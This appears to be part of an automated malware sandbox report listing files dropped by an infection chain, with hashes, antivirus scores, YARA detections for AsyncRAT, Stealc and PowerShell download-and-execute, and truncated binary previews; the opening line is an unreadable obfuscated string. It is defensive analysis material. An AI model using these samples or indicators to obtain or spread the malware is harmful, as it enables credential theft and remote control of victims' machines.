Preview:	Set Worthy=6..HoRuBrandon Alleged ..JBybInquiries Jonathan ..GPITexts ..kIaLips Motivation ..QVsCrash Interested Pocket Handheld ..rcAssuming Lid Stadium Uganda Voted Exposed Locked ..HmFsAccess Britney Verified Complement Sample Belly Native Indicate Cyber ..FOqqShelf Bucks Literature Reasonably Des Dressed Sons Accused Fuck ..xPZPExplosion ..qBFine Ranked ..Set Crew=n..QfRIChannels Vibrators Expert ..YBYBb Oz Coins Boutique Moves Instant Greenhouse Employee ..HkBSalon Jeans Screen ..tUlHolding Work Yo Floating Campaign Morgan Hs ..nRmHousewives Treatments Thomson Announced ..iNPrepared Cyber Paul Offers Buffer Using Fundamental Jeans Magnet ..Set Tee=l..OiIColumbus Restoration Informational Taking Wake Sorted ..PLSun Studios ..McXDonald Argument ..szCompressed Copies Vice ..EXTEDiscover Details Sudan ..JTYBetty Stakeholders Testimony Ur Banks Lexington Thomson Scholars ..WmAIntersection ..PBPlatforms Actors Thumbnails ..SSFNeo Facial Televisions Tsunami Dinner Dies ..lyKelkoo Elderly

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 06:54:39 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4795893398408833
Encrypted:	false
SSDEEP:	48:8SZ7dvTgtI0lRYrnvPdAKRkdAGdAKRFdAKRr:8Sjcq7
MD5:	2EDB2BF09702183DCF2C733EB3DC886F
SHA1:	3A97F03EAC772DE53B652B639403EDC9AC7CEA88
SHA-256:	C68ACEE19A242AF26704D52F77B335463A995F55242013A9FD4427FE501BD826
SHA-512:	08AF25590070DBCF6C47DF52456C3861A74C5947B6825A3F1965CFA52BB997D6DC96F57E4A1EE57D94BC0FD2E63FD8D508F2D15ACCC6A109A66FADB9CC98F64D
Malicious:	false
Preview:	L..................F.@.. ......,......61a....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.=..PROGRA~1..t......O.IEW.>....B...............J.......z.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.8....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.8..Chrome..>......CW.VEW.8....M.....................>.i.C.h.r.o.m.e.....`.1.....EW.8..APPLIC~1..H......CW.VEW.8..........................>.i.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.>..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GOLD.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XBckuYbXje.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\XBckuYbXje.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wxfM3haI2K.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\wxfM3haI2K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	105184
Entropy (8bit):	4.013519673540356
Encrypted:	false
SSDEEP:	1536:SRkPsMyNCWuAz7h/iAGIny8JFu1vKdXx9x:ykPsMyNCWuwh/imJFgCXV
MD5:	89D31579649ECB2686E278AEE15B5E84
SHA1:	617E9CC9E1BC0CAA3DA70F7EC738CE7D60758476
SHA-256:	F3AA26B438EC81B76DE1BF8B2E67A4848FFBDCA5B5947D0569ECE900EA45200E
SHA-512:	5A9D70C2398299D2B45A8E83E974E8885A06AA6F7F826CD96AA9386F5D0D271A47DAFC54D7B6B302E66E6E1BC4560DF78ADDBFC7008D40F80CAB4752C8C62B83
Malicious:	false
Preview:	....h... ...............P...............X.......]...@...................V.......e.n.-.C.H.;.e.n.-.G.B....... .......`..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................0..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D.................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\BitcoinCore[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10481152
Entropy (8bit):	6.549113701782075
Encrypted:	false
SSDEEP:	98304:Zk8Moeo9VZ4odf8Fn8U/J1vD3NSPUv3KWQSy+Bk:e8Moeo9VZLf8hvRlfKkhBk
MD5:	304A5A222857D412CDD4EFFBB1EC170E
SHA1:	34924C42524CA8E7FCC1FC604626D9C5F277DBA2
SHA-256:	D67FB52973C445A3488A9D6A9A9FF3EBEBB05B1C0E853CEBFA8BBA1A5953F0D6
SHA-512:	208B39436B520E909EB8262F68314DCB93852EA5F00A1D4CE8BD682DD5E20AD313E65FF293C8062BFED95FFE101F6EAD3D7DA4886E779031101329A3764B855F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f..........".......]..&B.....`.].......@..............................0.......................@............... ...............`g......pf..P...0q.../..@l.0.............g...............................g.(....................f.......f.F....................text.....].......]................. ..`.data.........].......].............@....bss....,.....e..........................idata...P...pf..R...ze.............@....didata.F.....f.......e.............@....edata.......`g......\f.............@..@.tls.........pg..........................rdata..m.....g......^f.............@..@.reloc........g......`f.............@..B.pdata..0....@l.......k.............@..@.rsrc...../..0q.../...o.............@..@.............0.....................@..@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	330792
Entropy (8bit):	7.984907013196583
Encrypted:	false
SSDEEP:	6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
MD5:	D6FCA3CD57293390CCF9D2BC83662DDA
SHA1:	94496D01AA91E981846299EEAC5631AB8B8C4A93
SHA-256:	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
SHA-512:	3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X."...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r..fH...6.......#.....kqzT+.S....0.A..p.1.....f..\|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0\|:.r.E.3..%Y..u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Set-up[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6573502
Entropy (8bit):	6.619875539021286
Encrypted:	false
SSDEEP:	49152:OS/eyZF6znxR9oClho8FKVC/HOXT0je05iMUpU31bY+oTNQ+nJJo3qUssbVL:OS92xvoClSefWXT0je2qXFk6UsspL
MD5:	EE1442544088C8A6AC94E0A849CBCCE2
SHA1:	E66FCD37D0A4ABC6168A15EEC6213B22491DC5F3
SHA-256:	544771F1F73C63161AE6A231FF4EE4A4109882F331D0F8B627CCADCD64C3DD41
SHA-512:	29D662EF64951EA1140E481960B93703F94B69519006B2A214CE8C371290ACCF0C2B4B83B4ED5DB0F05B77309B4A8CD0C4D25EB1635F9A6F8C025297538BA2B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.D^..$.........#.4G...Y...f..........PG...@.................................ZJe....... .........................B....................................... ..........................$.G....................................................text....3G......4G.................`.P`.data...h....PG......:G.............@.`..rdata..8....pG......NG.............@.`@/4.......y... H..z....G.............@.0@.bss....T.f...K.......................`..edata..B............jK.............@.0@.idata...............lK.............@.0..CRT....4............vK.............@.0..tls.................xK.............@.0..reloc... ......"...zK.............@.0B/14...................Y.............@..B/29..................Y.............@..B/41.....XL.......N...L[.............@..B/55.....B.............[.............@..B/67.....T............~\.............@.0B/80.....a.... ........\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	6.520506949765309
Encrypted:	false
SSDEEP:	3072:TULcxmRdWPMV7e9VdQsH1bf8jQBDud7r6GiX8QiQ/avY:TKdWPMV7aesVbcSDudr6SEo
MD5:	C27417453090D3CF9A3884B503D22C49
SHA1:	17938ECE6999BC94D651743063C3F989E38547B4
SHA-256:	D330B3CEC745CE7BF9856E3CDCE277A52FE7AD09874D519FA7B9B080A61A7407
SHA-512:	27D115974702510F9EF7EB841D359764197429ED9D233F98FACEC317FDAA8B4EC4E481103D8B950EE2F10711280E7296457107D928603AF2174B586233ABB443
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................N4... ...@....@.. ....................... ............@..................................3..O....@............................................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc..............................@..B................04......H.......Py..........0....................................................W......H3.......W......3........./.\.....{...."..}......{...."..}......{...."..}.....~....(....9.....~....(....(.....(....n~....(....~.....(....(.....r...p.(.....(.....@....(.....A...(....f.~#...}......}.....($.....($....~....%:....&~....../...sM...%.....sN...(O...~....(..........~....o....9 ...~.....(....(G...9....~.....(.....s................s)........~J................s.........r~....o

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	358912
Entropy (8bit):	5.978721741733768
Encrypted:	false
SSDEEP:	6144:gSVu917CQaNutVHcaOLnysBBPEDcu4jZ21sK0O:gSE91m7WSasBPu6Z2z
MD5:	D78D85135F584E455F692923D9FEB804
SHA1:	7BF6D4D00326ECFA3E48644896D3407AB473A9D5
SHA-256:	41582C8B6BD111A2F141DEE52B619D13278EF68754691263ABEB3238D485F404
SHA-512:	1FB4E040511F3BBF8C04459942D1A5915B5F8FE78DD169B932E04DC7CCDB227AEE42327A8071136B27A368F2FE8B8B5DE3C9187D4B3CC5354CBBA0A1D89D26BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....W...W...W...W...W...W...W...W...W.W...W...Wh..W...W...W...W...W...W...WRich...W........PE..L....qOd.................\|...,......8E............@..................................k.......................................~..P.... ...............................................................1..@............................................text...6z.......\|.................. ..`.data............v..................@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
